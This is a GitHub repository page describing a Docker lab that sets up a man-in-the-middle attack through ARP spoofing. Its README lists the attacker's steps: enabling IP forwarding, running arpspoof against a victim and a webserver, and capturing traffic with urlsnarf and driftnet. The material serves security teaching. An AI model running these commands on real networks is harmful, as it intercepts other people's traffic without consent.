Skip to content

DavidLangen/Man-In-The-Middle-Attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Setup for an Man-in-the-middle (MITM) attack

Prerequisite

  • Docker is installed
  • you can use docker-compose commands

Start

Just use following command: docker-compose up --build

Infrastructure

There are 3 Machines:

  • Webserver
  • MITM with Kali Linux
  • Victim Node (just an simple Alpine Linux)

Steps (MITM):

  1. Setup IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  2. start arpspoof(Important: let it open): arpspoof -i eth0 -t [Victim-IP] -r [Webserver-IP]
  3. Now you can use:
  • urlsnarf -i eth0 -> get HTTP-Requests
  • driftnet -i eth0 -> get Images

Steps (Victim)

Just type inside wget webserver:8080 or outside docker exec victim webserver:8080

About

A Docker Setup for a "Man in the Middle" (MITM) Attack via ARP Spoofing

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors